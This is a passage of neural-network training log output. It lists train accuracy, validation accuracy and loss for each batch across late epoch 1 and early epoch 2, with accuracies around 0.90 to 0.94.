Validation Accuracy: 0.899, Loss: 0.973\nEpoch 1 Batch 479/538 - Train Accuracy: 0.940, Validation Accuracy: 0.910, Loss: 0.889\nEpoch 1 Batch 480/538 - Train Accuracy: 0.931, Validation Accuracy: 0.910, Loss: 0.961\nEpoch 1 Batch 481/538 - Train Accuracy: 0.912, Validation Accuracy: 0.907, Loss: 0.902\nEpoch 1 Batch 482/538 - Train Accuracy: 0.905, Validation Accuracy: 0.902, Loss: 0.958\nEpoch 1 Batch 483/538 - Train Accuracy: 0.910, Validation Accuracy: 0.894, Loss: 0.887\nEpoch 1 Batch 484/538 - Train Accuracy: 0.926, Validation Accuracy: 0.898, Loss: 0.945\nEpoch 1 Batch 485/538 - Train Accuracy: 0.922, Validation Accuracy: 0.903, Loss: 0.968\nEpoch 1 Batch 486/538 - Train Accuracy: 0.928, Validation Accuracy: 0.908, Loss: 0.923\nEpoch 1 Batch 487/538 - Train Accuracy: 0.912, Validation Accuracy: 0.905, Loss: 0.915\nEpoch 1 Batch 488/538 - Train Accuracy: 0.934, Validation Accuracy: 0.903, Loss: 0.918\nEpoch 1 Batch 489/538 - Train Accuracy: 0.903, Validation Accuracy: 0.911, Loss: 0.935\nEpoch 1 Batch 490/538 - Train Accuracy: 0.929, Validation Accuracy: 0.912, Loss: 0.914\nEpoch 1 Batch 491/538 - Train Accuracy: 0.902, Validation Accuracy: 0.913, Loss: 0.945\nEpoch 1 Batch 492/538 - Train Accuracy: 0.921, Validation Accuracy: 0.916, Loss: 0.939\nEpoch 1 Batch 493/538 - Train Accuracy: 0.903, Validation Accuracy: 0.921, Loss: 0.941\nEpoch 1 Batch 494/538 - Train Accuracy: 0.927, Validation Accuracy: 0.920, Loss: 0.942\nEpoch 1 Batch 495/538 - Train Accuracy: 0.913, Validation Accuracy: 0.920, Loss: 0.952\nEpoch 1 Batch 496/538 - Train Accuracy: 0.933, Validation Accuracy: 0.922, Loss: 0.890\nEpoch 1 Batch 497/538 - Train Accuracy: 0.937, Validation Accuracy: 0.922, Loss: 0.951\nEpoch 1 Batch 498/538 - Train Accuracy: 0.918, Validation Accuracy: 0.921, Loss: 0.906\nEpoch 1 Batch 499/538 - Train Accuracy: 0.923, Validation Accuracy: 0.918, Loss: 0.958\nEpoch 1 Batch 500/538 - Train Accuracy: 0.938, Validation Accuracy: 0.912, Loss: 0.897\nEpoch 1 Batch 501/538 - Train Accuracy: 0.923, Validation Accuracy: 0.910, Loss: 0.960\nEpoch 1 Batch 502/538 - Train Accuracy: 0.917, Validation Accuracy: 0.914, Loss: 0.918\nEpoch 1 Batch 503/538 - Train Accuracy: 0.932, Validation Accuracy: 0.917, Loss: 0.960\nEpoch 1 Batch 504/538 - Train Accuracy: 0.948, Validation Accuracy: 0.923, Loss: 0.895\nEpoch 1 Batch 505/538 - Train Accuracy: 0.934, Validation Accuracy: 0.919, Loss: 0.919\nEpoch 1 Batch 506/538 - Train Accuracy: 0.924, Validation Accuracy: 0.911, Loss: 0.913\nEpoch 1 Batch 507/538 - Train Accuracy: 0.897, Validation Accuracy: 0.908, Loss: 0.956\nEpoch 1 Batch 508/538 - Train Accuracy: 0.919, Validation Accuracy: 0.907, Loss: 0.939\nEpoch 1 Batch 509/538 - Train Accuracy: 0.946, Validation Accuracy: 0.910, Loss: 0.907\nEpoch 1 Batch 510/538 - Train Accuracy: 0.926, Validation Accuracy: 0.911, Loss: 0.927\nEpoch 1 Batch 511/538 - Train Accuracy: 0.915, Validation Accuracy: 0.908, Loss: 0.911\nEpoch 1 Batch 512/538 - Train Accuracy: 0.934, Validation Accuracy: 0.908, Loss: 0.939\nEpoch 1 Batch 513/538 - Train Accuracy: 0.892, Validation Accuracy: 0.914, Loss: 0.963\nEpoch 1 Batch 514/538 - Train Accuracy: 0.925, Validation Accuracy: 0.922, Loss: 0.930\nEpoch 1 Batch 515/538 - Train Accuracy: 0.921, Validation Accuracy: 0.932, Loss: 0.933\nEpoch 1 Batch 516/538 - Train Accuracy: 0.906, Validation Accuracy: 0.930, Loss: 0.901\nEpoch 1 Batch 517/538 - Train Accuracy: 0.928, Validation Accuracy: 0.922, Loss: 0.924\nEpoch 1 Batch 518/538 - Train Accuracy: 0.895, Validation Accuracy: 0.917, Loss: 0.915\nEpoch 1 Batch 519/538 - Train Accuracy: 0.934, Validation Accuracy: 0.922, Loss: 0.938\nEpoch 1 Batch 520/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.958\nEpoch 1 Batch 521/538 - Train Accuracy: 0.931, Validation Accuracy: 0.923, Loss: 1.001\nEpoch 1 Batch 522/538 - Train Accuracy: 0.924, Validation Accuracy: 0.923, Loss: 0.893\nEpoch 1 Batch 523/538 - Train Accuracy: 0.926, Validation Accuracy: 0.929, Loss: 0.901\nEpoch 1 Batch 524/538 - Train Accuracy: 0.936, Validation Accuracy: 0.918, Loss: 0.966\nEpoch 1 Batch 525/538 - Train Accuracy: 0.927, Validation Accuracy: 0.918, Loss: 0.915\nEpoch 1 Batch 526/538 - Train Accuracy: 0.931, Validation Accuracy: 0.911, Loss: 0.942\nEpoch 1 Batch 527/538 - Train Accuracy: 0.946, Validation Accuracy: 0.913, Loss: 0.904\nEpoch 1 Batch 528/538 - Train Accuracy: 0.922, Validation Accuracy: 0.918, Loss: 0.934\nEpoch 1 Batch 529/538 - Train Accuracy: 0.909, Validation Accuracy: 0.926, Loss: 0.944\nEpoch 1 Batch 530/538 - Train Accuracy: 0.900, Validation Accuracy: 0.919, Loss: 0.883\nEpoch 1 Batch 531/538 - Train Accuracy: 0.921, Validation Accuracy: 0.921, Loss: 0.933\nEpoch 1 Batch 532/538 - Train Accuracy: 0.930, Validation Accuracy: 0.919, Loss: 0.932\nEpoch 1 Batch 533/538 - Train Accuracy: 0.931, Validation Accuracy: 0.923, Loss: 0.881\nEpoch 1 Batch 534/538 - Train Accuracy: 0.935, Validation Accuracy: 0.917, Loss: 0.873\nEpoch 1 Batch 535/538 - Train Accuracy: 0.941, Validation Accuracy: 0.922, Loss: 0.919\nEpoch 1 Batch 536/538 - Train Accuracy: 0.953, Validation Accuracy: 0.923, Loss: 0.909\nEpoch 2 Batch 0/538 - Train Accuracy: 0.938, Validation Accuracy: 0.924, Loss: 0.934\nEpoch 2 Batch 1/538 - Train Accuracy: 0.946, Validation Accuracy: 0.923, Loss: 0.946\nEpoch 2 Batch 2/538 - Train Accuracy: 0.929, Validation Accuracy: 0.919, Loss: 0.927\nEpoch 2 Batch 3/538 - Train Accuracy: 0.948, Validation Accuracy: 0.918, Loss: 0.933\nEpoch 2 Batch 4/538 - Train Accuracy: 0.931, Validation Accuracy: 0.912, Loss: 0.913\nEpoch 2 Batch 5/538 - Train Accuracy: 0.928, Validation Accuracy: 0.917, Loss: 0.927\nEpoch 2 Batch 6/538 - Train Accuracy: 0.939, Validation Accuracy: 0.912, Loss: 0.935\nEpoch 2 Batch 7/538 - Train Accuracy: 0.936, Validation Accuracy: 0.915, Loss: 0.934\nEpoch 2 Batch 8/538 - Train Accuracy: 0.938, Validation Accuracy: 0.913, Loss: 0.943\nEpoch 2 Batch 9/538 - Train Accuracy: 0.906, Validation Accuracy: 0.915, Loss: 0.924\nEpoch 2 Batch 10/538 - Train Accuracy: 0.910, Validation Accuracy: 0.917, Loss: 0.929\nEpoch 2 Batch 11/538 - Train Accuracy: 0.930, Validation Accuracy: 0.912, Loss: 0.889\nEpoch 2 Batch 12/538 - Train Accuracy: 0.935, Validation Accuracy: 0.911, Loss: 0.960\nEpoch 2 Batch 13/538 - Train Accuracy: 0.941, Validation Accuracy: 0.919, Loss: 0.909\nEpoch 2 Batch 14/538 - Train Accuracy: 0.934, Validation Accuracy: 0.915, Loss: 0.930\nEpoch 2 Batch 15/538 - Train Accuracy: 0.941, Validation Accuracy: 0.914, Loss: 0.891\nEpoch 2 Batch 16/538 - Train Accuracy: 0.932, Validation Accuracy: 0.921, Loss: 0.892\nEpoch 2 Batch 17/538 - Train Accuracy: 0.929, Validation Accuracy: 0.926, Loss: 0.930\nEpoch 2 Batch 18/538 - Train Accuracy: 0.942, Validation Accuracy: 0.925, Loss: 0.944\nEpoch 2 Batch 19/538 - Train Accuracy: 0.924, Validation Accuracy: 0.926, Loss: 0.943\nEpoch 2 Batch 20/538 - Train Accuracy: 0.936, Validation Accuracy: 0.924, Loss: 0.968\nEpoch 2 Batch 21/538 - Train Accuracy: 0.942, Validation Accuracy: 0.923, Loss: 0.956\nEpoch 2 Batch 22/538 - Train Accuracy: 0.904, Validation Accuracy: 0.924, Loss: 0.901\nEpoch 2 Batch 23/538 - Train Accuracy: 0.915, Validation Accuracy: 0.925, Loss: 0.939\nEpoch 2 Batch 24/538 - Train Accuracy: 0.932, Validation Accuracy: 0.917, Loss: 0.981\nEpoch 2 Batch 25/538 - Train Accuracy: 0.925, Validation Accuracy: 0.918, Loss: 0.962\nEpoch 2 Batch 26/538 - Train Accuracy: 0.923, Validation Accuracy: 0.913, Loss: 0.963\nEpoch 2 Batch 27/538 - Train Accuracy: 0.940, Validation Accuracy: 0.909, Loss: 0.891\nEpoch 2 Batch 28/538 - Train Accuracy: 0.919, Validation Accuracy: 0.916, Loss: 0.921\nEpoch 2 Batch 29/538 - Train Accuracy: 0.947, Validation Accuracy: 0.915, Loss: 0.919\nEpoch 2 Batch 30/538 - Train Accuracy: 0.923, Validation Accuracy: 0.918, Loss: 0.969\nEpoch 2 Batch 31/538 - Train Accuracy: 0.934, Validation Accuracy: 0.923, Loss: 0.912\nEpoch 2 Batch 32/538 - Train Accuracy: 0.926, Validation Accuracy: 0.918, Loss: 0.948\nEpoch 2 Batch 33/538 - Train Accuracy: 0.937, Validation Accuracy: 0.914, Loss: 0.911\nEpoch 2 Batch 34/538 - Train Accuracy: 0.916, Validation Accuracy: 0.919, Loss: 0.974\nEpoch 2 Batch 35/538 - Train Accuracy: 0.927, Validation Accuracy: 0.920, Loss: 0.888\nEpoch 2 Batch 36/538 - Train Accuracy: 0.933, Validation Accuracy: 0.925, Loss: 0.902\nEpoch 2 Batch 37/538 - Train Accuracy: 0.931, Validation Accuracy: 0.919, Loss: 0.932\nEpoch 2 Batch 38/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.898\nEpoch 2 Batch 39/538 - Train Accuracy: 0.936, Validation Accuracy: 0.924, Loss: 0.867\nEpoch 2 Batch 40/538 - Train Accuracy: 0.924, Validation Accuracy: 0.917, Loss: 0.884\nEpoch 2 Batch 41/538 - Train Accuracy: 0.931, Validation Accuracy: 0.921, Loss: 0.961\nEpoch 2 Batch 42/538 - Train Accuracy: 0.929, Validation Accuracy: 0.932, Loss: 0.948\nEpoch 2 Batch 43/538 - Train Accuracy: 0.896, Validation Accuracy: 0.932, Loss: 0.915\nEpoch 2 Batch 44/538 - Train Accuracy: 0.921, Validation Accuracy: 0.933, Loss: 0.901\nEpoch 2 Batch 45/538 - Train Accuracy: 0.930, Validation Accuracy: 0.930, Loss: 0.897\nEpoch 2 Batch 46/538 - Train Accuracy: 0.947, Validation Accuracy: 0.927, Loss: 0.899\nEpoch 2 Batch 47/538 - Train Accuracy: 0.928, Validation Accuracy: 0.929, Loss: 0.939\nEpoch 2 Batch 48/538 - Train Accuracy: 0.894, Validation Accuracy: 0.937, Loss: 0.968\nEpoch 2 Batch 49/538 - Train Accuracy: 0.921, Validation Accuracy: 0.937, Loss: 0.980\nEpoch 2 Batch 50/538 - Train Accuracy: 0.921, Validation Accuracy: 0.928, Loss: 0.901\nEpoch 2 Batch 51/538 - Train Accuracy: 0.929, Validation Accuracy: 0.926, Loss: 0.926\nEpoch 2 Batch 52/538 - Train Accuracy: 0.926, Validation Accuracy: 0.930, Loss: 0.949\nEpoch 2 Batch 53/538 - Train Accuracy: 0.898, Validation Accuracy: 0.928, Loss: 0.912\nEpoch 2 Batch 54/538 - Train Accuracy: 0.942, Validation Accuracy: 0.928, Loss: 0.908\nEpoch 2 Batch 55/538 - Train Accuracy: 0.910, Validation Accuracy: 0.927, Loss: 0.931\nEpoch 2 Batch 56/538 - Train Accuracy: 0.929, Validation Accuracy: 0.920, Loss: 0.951\nEpoch 2 Batch 57/538 - Train Accuracy: 0.918, Validation Accuracy: 0.922, Loss: 0.887\nEpoch 2 Batch 58/538 - Train Accuracy: 0.921, Validation Accuracy: 0.911, Loss: 0.932\nEpoch 2 Batch 59/538 - Train Accuracy: 0.924, Validation Accuracy: 0.915, Loss: 0.928\nEpoch 2 Batch 60/538 - Train Accuracy: 0.934, Validation Accuracy: 0.906, Loss: 0.940\nEpoch 2 Batch 61/538 - Train Accuracy: 0.940, Validation Accuracy: 0.907, Loss: 0.923\nEpoch 2 Batch 62/538 - Train Accuracy: 0.937, Validation Accuracy: 0.904, Loss: 0.926\nEpoch 2 Batch 63/538 - Train Accuracy: 0.935, Validation Accuracy: 0.907, Loss: 0.929\nEpoch 2 Batch 64/538 - Train Accuracy: 0.923, Validation Accuracy: 0.902, Loss: 0.922\nEpoch 2 Batch 65/538 - Train Accuracy: 0.923, Validation Accuracy: 0.903, Loss: 0.961\nEpoch 2 Batch 66/538 - Train Accuracy: 0.941, Validation Accuracy: 0.910, Loss: 0.916\nEpoch 2 Batch 67/538 - Train Accuracy: 0.940, Validation Accuracy: 0.906, Loss: 0.926\nEpoch 2 Batch 68/538 - Train Accuracy: 0.915, Validation Accuracy: 0.905, Loss: 0.922\nEpoch 2 Batch 69/538 - Train Accuracy: 0.936, Validation Accuracy: 0.908, Loss: 0.901\nEpoch 2 Batch 70/538 - Train Accuracy: 0.940, Validation Accuracy: 0.921, Loss: 0.910\nEpoch 2 Batch 71/538 - Train Accuracy: 0.928, Validation Accuracy: 0.920, Loss: 0.901\nEpoch 2 Batch 72/538 - Train Accuracy: 0.937, Validation Accuracy: 0.922, Loss: 0.939\nEpoch 2 Batch 73/538 - Train Accuracy: 0.925, Validation Accuracy: 0.917, Loss: 0.957\nEpoch 2 Batch 74/538 - Train Accuracy: 0.927, Validation Accuracy: 0.917, Loss: 0.945\nEpoch 2 Batch 75/538 - Train Accuracy: 0.925, Validation Accuracy: 0.922, Loss: 0.975\nEpoch 2 Batch 76/538 - Train Accuracy: 0.932, Validation Accuracy: 0.920, Loss: 0.959\nEpoch 2 Batch 77/538 - Train Accuracy: 0.941, Validation Accuracy: 0.913, Loss: 0.943\nEpoch 2 Batch 78/538 - Train Accuracy: 0.918, Validation Accuracy: 0.909, Loss: 0.885\nEpoch 2 Batch 79/538 - Train Accuracy: 0.933, Validation Accuracy: 0.908, Loss: 0.905\nEpoch 2 Batch 80/538 - Train Accuracy: 0.937, Validation Accuracy: 0.911, Loss: 0.884\nEpoch 2 Batch 81/538 - Train Accuracy: 0.925, Validation Accuracy: 0.919, Loss: 0.955\nEpoch 2 Batch 82/538 - Train Accuracy: 0.927, Validation Accuracy: 0.919, Loss: 0.952\nEpoch 2 Batch 83/538 - Train Accuracy: 0.912, Validation Accuracy: 0.921, Loss: 0.903\nEpoch 2 Batch 84/538 - Train Accuracy: 0.919, Validation Accuracy: 0.926, Loss: 0.949\nEpoch 2 Batch 85/538 - Train Accuracy: 0.934, Validation Accuracy: 0.933, Loss: 0.923\nEpoch 2 Batch 86/538 - Train Accuracy: 0.929, Validation Accuracy: 0.927, Loss: 0.885\nEpoch 2 Batch 87/538 - Train Accuracy: 0.919, Validation Accuracy: 0.922, Loss: 0.944\nEpoch 2 Batch 88/538 - Train Accuracy: 0.933, Validation Accuracy: 0.922, Loss: 0.938\nEpoch 2 Batch 89/538 - Train Accuracy: 0.922, Validation Accuracy: 0.927, Loss: 0.920\nEpoch 2 Batch 90/538 - Train Accuracy: 0.928, Validation Accuracy: 0.927, Loss: 0.962\nEpoch 2 Batch 91/538 - Train Accuracy: 0.939, Validation Accuracy: 0.930, Loss: 0.941\nEpoch 2 Batch 92/538 - Train Accuracy: 0.926, Validation Accuracy: 0.923, Loss: 0.944\nEpoch 2 Batch 93/538 - Train Accuracy: 0.924, Validation Accuracy: 0.921, Loss: 0.875\nEpoch 2 Batch 94/538 - Train Accuracy: 0.934, Validation Accuracy: 0.925, Loss: 0.949\nEpoch 2 Batch 95/538 - Train Accuracy: 0.912, Validation Accuracy: 0.917, Loss: 0.949\nEpoch 2 Batch 96/538 - Train Accuracy: 0.948, Validation Accuracy: 0.919, Loss: 0.892\nEpoch 2 Batch 97/538 - Train Accuracy: 0.936, Validation Accuracy: 0.914, Loss: 0.908\nEpoch 2 Batch 98/538 - Train Accuracy: 0.936, Validation Accuracy: 0.921, Loss: 0.932\nEpoch 2 Batch 99/538 - Train Accuracy: 0.919, Validation Accuracy: 0.924, Loss: 0.919\nEpoch 2 Batch 100/538 - Train Accuracy: 0.938, Validation Accuracy: 0.924, Loss: 0.931\nEpoch 2 Batch 101/538 - Train Accuracy: 0.907, Validation Accuracy: 0.926, Loss: 0.937\nEpoch 2 Batch 102/538 - Train Accuracy: 0.906, Validation Accuracy: 0.924, Loss: 0.877\nEpoch 2 Batch 103/538 - Train Accuracy: 0.920, Validation Accuracy: 0.926, Loss: 0.930\nEpoch 2 Batch 104/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.928\nEpoch 2 Batch 105/538 - Train Accuracy: 0.942, Validation Accuracy: 0.920, Loss: 0.906\nEpoch 2 Batch 106/538 - Train Accuracy: 0.901, Validation Accuracy: 0.915, Loss: 0.870\nEpoch 2 Batch 107/538 - Train Accuracy: 0.918, Validation Accuracy: 0.919, Loss: 0.923\nEpoch 2 Batch 108/538 - Train Accuracy: 0.944, Validation Accuracy: 0.925, Loss: 0.891\nEpoch 2 Batch 109/538 - Train Accuracy: 0.960, Validation Accuracy: 0.914, Loss: 0.911\nEpoch 2 Batch 110/538 - Train Accuracy: 0.938, Validation Accuracy: 0.909, Loss: 0.911\nEpoch 2 Batch 111/538 - Train Accuracy: 0.934, Validation Accuracy: 0.909, Loss: 0.873\nEpoch 2 Batch 112/538 - Train Accuracy: 0.935, Validation Accuracy: 0.903, Loss: 0.915\nEpoch 2 Batch 113/538 - Train Accuracy: 0.916, Validation Accuracy: 0.902, Loss: 0.887\nEpoch 2 Batch 114/538 - Train Accuracy: 0.936, Validation Accuracy: 0.908, Loss: 0.955\nEpoch 2 Batch 115/538 - Train Accuracy: 0.935, Validation Accuracy: 0.906, Loss: 0.899\nEpoch 2 Batch 116/538 - Train Accuracy: 0.928, Validation Accuracy: 0.908, Loss: 0.933\nEpoch 2 Batch 117/538 - Train Accuracy: 0.915, Validation Accuracy: 0.904, Loss: 0.921\nEpoch 2 Batch 118/538 - Train Accuracy: 0.923, Validation Accuracy: 0.905, Loss: 0.888\nEpoch 2 Batch 119/538 - Train Accuracy: 0.955, Validation Accuracy: 0.920, Loss: 0.941\nEpoch 2 Batch 120/538 - Train Accuracy: 0.941, Validation Accuracy: 0.922, Loss: 0.967\nEpoch 2 Batch 121/538 - Train Accuracy: 0.926, Validation Accuracy: 0.927, Loss: 0.947\nEpoch 2 Batch 122/538 - Train Accuracy: 0.916, Validation Accuracy: 0.924, Loss: 0.933\nEpoch 2 Batch 123/538 - Train Accuracy: 0.923, Validation Accuracy: 0.923, Loss: 0.871\nEpoch 2 Batch 124/538 - Train Accuracy: 0.943, Validation Accuracy: 0.915, Loss: 0.933\nEpoch 2 Batch 125/538 - Train Accuracy: 0.915, Validation Accuracy: 0.910, Loss: 0.956\nEpoch 2 Batch 126/538 - Train Accuracy: 0.925, Validation Accuracy: 0.913, Loss: 0.944\nEpoch 2 Batch 127/538 - Train Accuracy: 0.910, Validation Accuracy: 0.910, Loss: 0.907\nEpoch 2 Batch 128/538 - Train Accuracy: 0.926, Validation Accuracy: 0.910, Loss: 0.917\nEpoch 2 Batch 129/538 - Train Accuracy: 0.923, Validation Accuracy: 0.908, Loss: 0.866\nEpoch 2 Batch 130/538 - Train Accuracy: 0.935, Validation Accuracy: 0.908, Loss: 0.915\nEpoch 2 Batch 131/538 - Train Accuracy: 0.942, Validation Accuracy: 0.913, Loss: 0.892\nEpoch 2 Batch 132/538 - Train Accuracy: 0.908, Validation Accuracy: 0.919, Loss: 0.887\nEpoch 2 Batch 133/538 - Train Accuracy: 0.931, Validation Accuracy: 0.920, Loss: 0.869\nEpoch 2 Batch 134/538 - Train Accuracy: 0.914, Validation Accuracy: 0.923, Loss: 0.923\nEpoch 2 Batch 135/538 - Train Accuracy: 0.932, Validation Accuracy: 0.922, Loss: 0.948\nEpoch 2 Batch 136/538 - Train Accuracy: 0.940, Validation Accuracy: 0.924, Loss: 0.916\nEpoch 2 Batch 137/538 - Train Accuracy: 0.921, Validation Accuracy: 0.924, Loss: 0.932\nEpoch 2 Batch 138/538 - Train Accuracy: 0.923, Validation Accuracy: 0.923, Loss: 0.931\nEpoch 2 Batch 139/538 - Train Accuracy: 0.925, Validation Accuracy: 0.926, Loss: 0.935\nEpoch 2 Batch 140/538 - Train Accuracy: 0.926, Validation Accuracy: 0.923, Loss: 0.952\nEpoch 2 Batch 141/538 - Train Accuracy: 0.935, Validation Accuracy: 0.914, Loss: 0.934\nEpoch 2 Batch 142/538 - Train Accuracy: 0.937, Validation Accuracy: 0.914, Loss: 0.959\nEpoch 2 Batch 143/538 - Train Accuracy: 0.948, Validation Accuracy: 0.915, Loss: 0.913\nEpoch 2 Batch 144/538 - Train Accuracy: 0.936, Validation Accuracy: 0.920, Loss: 0.995\nEpoch 2 Batch 145/538 - Train Accuracy: 0.919, Validation Accuracy: 0.919, Loss: 0.935\nEpoch 2 Batch 146/538 - Train Accuracy: 0.926, Validation Accuracy: 0.914, Loss: 0.898\nEpoch 2 Batch 147/538 - Train Accuracy: 0.935, Validation Accuracy: 0.911, Loss: 0.920\nEpoch 2 Batch 148/538 - Train Accuracy: 0.916, Validation Accuracy: 0.910, Loss: 0.985\nEpoch 2 Batch 149/538 - Train Accuracy: 0.943, Validation Accuracy: 0.915, Loss: 0.921\nEpoch 2 Batch 150/538 - Train Accuracy: 0.939, Validation Accuracy: 0.917, Loss: 0.911\nEpoch 2 Batch 151/538 - Train Accuracy: 0.938, Validation Accuracy: 0.914, Loss: 0.919\nEpoch 2 Batch 152/538 - Train Accuracy: 0.939, Validation Accuracy: 0.912, Loss: 0.962\nEpoch 2 Batch 153/538 - Train Accuracy: 0.916, Validation Accuracy: 0.908, Loss: 0.930\nEpoch 2 Batch 154/538 - Train Accuracy: 0.945, Validation Accuracy: 0.906, Loss: 0.923\nEpoch 2 Batch 155/538 - Train Accuracy: 0.932, Validation Accuracy: 0.921, Loss: 0.950\nEpoch 2 Batch 156/538 - Train Accuracy: 0.936, Validation Accuracy: 0.930, Loss: 0.898\nEpoch 2 Batch 157/538 - Train Accuracy: 0.939, Validation Accuracy: 0.928, Loss: 0.883\nEpoch 2 Batch 158/538 - Train Accuracy: 0.939, Validation Accuracy: 0.925, Loss: 0.870\nEpoch 2 Batch 159/538 - Train Accuracy: 0.922, Validation Accuracy: 0.927, Loss: 0.928\nEpoch 2 Batch 160/538 - Train Accuracy: 0.919, Validation Accuracy: 0.926, Loss: 0.923\nEpoch 2 Batch 161/538 - Train Accuracy: 0.930, Validation Accuracy: 0.919, Loss: 0.912\nEpoch 2 Batch 162/538 - Train Accuracy: 0.930, Validation Accuracy: 0.918, Loss: 0.932\nEpoch 2 Batch 163/538 - Train Accuracy: 0.916, Validation Accuracy: 0.914, Loss: 0.915\nEpoch 2 Batch 164/538 - Train Accuracy: 0.932, Validation Accuracy: 0.907, Loss: 1.000\nEpoch 2 Batch 165/538 - Train Accuracy: 0.913, Validation Accuracy: 0.915, Loss: 0.943\nEpoch 2 Batch 166/538 - Train Accuracy: 0.950, Validation Accuracy: 0.911, Loss: 0.904\nEpoch 2 Batch 167/538 - Train Accuracy: 0.924, Validation Accuracy: 0.908, Loss: 0.961\nEpoch 2 Batch 168/538 - Train Accuracy: 0.927, Validation Accuracy: 0.913, Loss: 0.925\nEpoch 2 Batch 169/538 - Train Accuracy: 0.927, Validation Accuracy: 0.922, Loss: 0.928\nEpoch 2 Batch 170/538 - Train Accuracy: 0.921, Validation Accuracy: 0.914, Loss: 0.967\nEpoch 2 Batch 171/538 - Train Accuracy: 0.912, Validation Accuracy: 0.914, Loss: 0.887\nEpoch 2 Batch 172/538 - Train Accuracy: 0.916, Validation Accuracy: 0.914, Loss: 0.923\nEpoch 2 Batch 173/538 - Train Accuracy: 0.930, Validation Accuracy: 0.914, Loss: 0.896\nEpoch 2 Batch 174/538 - Train Accuracy: 0.935, Validation Accuracy: 0.914, Loss: 0.934\nEpoch 2 Batch 175/538 - Train Accuracy: 0.943, Validation Accuracy: 0.914, Loss: 0.905\nEpoch 2 Batch 176/538 - Train Accuracy: 0.924, Validation Accuracy: 0.912, Loss: 0.930\nEpoch 2 Batch 177/538 - Train Accuracy: 0.922, Validation Accuracy: 0.919, Loss: 0.941\nEpoch 2 Batch 178/538 - Train Accuracy: 0.898, Validation Accuracy: 0.920, Loss: 0.899\nEpoch 2 Batch 179/538 - Train Accuracy: 0.944, Validation Accuracy: 0.928, Loss: 0.887\nEpoch 2 Batch 180/538 - Train Accuracy: 0.938, Validation Accuracy: 0.925, Loss: 0.902\nEpoch 2 Batch 181/538 - Train Accuracy: 0.911, Validation Accuracy: 0.919, Loss: 0.932\nEpoch 2 Batch 182/538 - Train Accuracy: 0.948, Validation Accuracy: 0.920, Loss: 0.962\nEpoch 2 Batch 183/538 - Train Accuracy: 0.945, Validation Accuracy: 0.918, Loss: 0.923\nEpoch 2 Batch 184/538 - Train Accuracy: 0.937, Validation Accuracy: 0.924, Loss: 0.929\nEpoch 2 Batch 185/538 - Train Accuracy: 0.948, Validation Accuracy: 0.924, Loss: 0.921\nEpoch 2 Batch 186/538 - Train Accuracy: 0.935, Validation Accuracy: 0.934, Loss: 0.915\nEpoch 2 Batch 187/538 - Train Accuracy: 0.930, Validation Accuracy: 0.939, Loss: 0.925\nEpoch 2 Batch 188/538 - Train Accuracy: 0.942, Validation Accuracy: 0.932, Loss: 0.898\nEpoch 2 Batch 189/538 - Train Accuracy: 0.937, Validation Accuracy: 0.932, Loss: 0.938\nEpoch 2 Batch 190/538 - Train Accuracy: 0.921, Validation Accuracy: 0.926, Loss: 0.959\nEpoch 2 Batch 191/538 - Train Accuracy: 0.939, Validation Accuracy: 0.925, Loss: 0.926\nEpoch 2 Batch 192/538 - Train Accuracy: 0.937, Validation Accuracy: 0.929, Loss: 0.964\nEpoch 2 Batch 193/538 - Train Accuracy: 0.932, Validation Accuracy: 0.931, Loss: 0.925\nEpoch 2 Batch 194/538 - Train Accuracy: 0.913, Validation Accuracy: 0.935, Loss: 0.934\nEpoch 2 Batch 195/538 - Train Accuracy: 0.932, Validation Accuracy: 0.927, Loss: 0.925\nEpoch 2 Batch 196/538 - Train Accuracy: 0.928, Validation Accuracy: 0.928, Loss: 0.909\nEpoch 2 Batch 197/538 - Train Accuracy: 0.927, Validation Accuracy: 0.931, Loss: 0.948\nEpoch 2 Batch 198/538 - Train Accuracy: 0.939, Validation Accuracy: 0.931, Loss: 0.960\nEpoch 2 Batch 199/538 - Train Accuracy: 0.923, Validation Accuracy: 0.926, Loss: 0.901\nEpoch 2 Batch 200/538 - Train Accuracy: 0.942, Validation Accuracy: 0.928, Loss: 0.904\nEpoch 2 Batch 201/538 - Train Accuracy: 0.932, Validation Accuracy: 0.927, Loss: 0.909\nEpoch 2 Batch 202/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.909\nEpoch 2 Batch 203/538 - Train Accuracy: 0.917, Validation Accuracy: 0.920, Loss: 0.913\nEpoch 2 Batch 204/538 - Train Accuracy: 0.928, Validation Accuracy: 0.918, Loss: 0.899\nEpoch 2 Batch 205/538 - Train Accuracy: 0.947, Validation Accuracy: 0.922, Loss: 0.930\nEpoch 2 Batch 206/538 - Train Accuracy: 0.931, Validation Accuracy: 0.922, Loss: 0.915\nEpoch 2 Batch 207/538 - Train Accuracy: 0.934, Validation Accuracy: 0.921, Loss: 0.907\nEpoch 2 Batch 208/538 - Train Accuracy: 0.924, Validation Accuracy: 0.928, Loss: 0.948\nEpoch 2 Batch 209/538 - Train Accuracy: 0.960, Validation Accuracy: 0.933, Loss: 0.917\nEpoch 2 Batch 210/538 - Train Accuracy: 0.913, Validation Accuracy: 0.932, Loss: 0.919\nEpoch 2 Batch 211/538 - Train Accuracy: 0.922, Validation Accuracy: 0.941, Loss: 0.905\nEpoch 2 Batch 212/538 - Train Accuracy: 0.923, Validation Accuracy: 0.939, Loss: 0.899\nEpoch 2 Batch 213/538 - Train Accuracy: 0.940, Validation Accuracy: 0.938, Loss: 0.897\nEpoch 2 Batch 214/538 - Train Accuracy: 0.944, Validation Accuracy: 0.941, Loss: 0.927\nEpoch 2 Batch 215/538 - Train Accuracy: 0.944, Validation Accuracy: 0.939, Loss: 0.922\nEpoch 2 Batch 216/538 - Train Accuracy: 0.930, Validation Accuracy: 0.933, Loss: 0.886\nEpoch 2 Batch 217/538 - Train Accuracy: 0.940, Validation Accuracy: 0.935, Loss: 0.922\nEpoch 2 Batch 218/538 - Train Accuracy: 0.922, Validation Accuracy: 0.934, Loss: 0.890\nEpoch 2 Batch 219/538 - Train Accuracy: 0.913, Validation Accuracy: 0.929, Loss: 0.956\nEpoch 2 Batch 220/538 - Train Accuracy: 0.916, Validation Accuracy: 0.924, Loss: 0.922\nEpoch 2 Batch 221/538 - Train Accuracy: 0.941, Validation Accuracy: 0.920, Loss: 0.898\nEpoch 2 Batch 222/538 - Train Accuracy: 0.921, Validation Accuracy: 0.917, Loss: 0.967\nEpoch 2 Batch 223/538 - Train Accuracy: 0.931, Validation Accuracy: 0.925, Loss: 0.917\nEpoch 2 Batch 224/538 - Train Accuracy: 0.926, 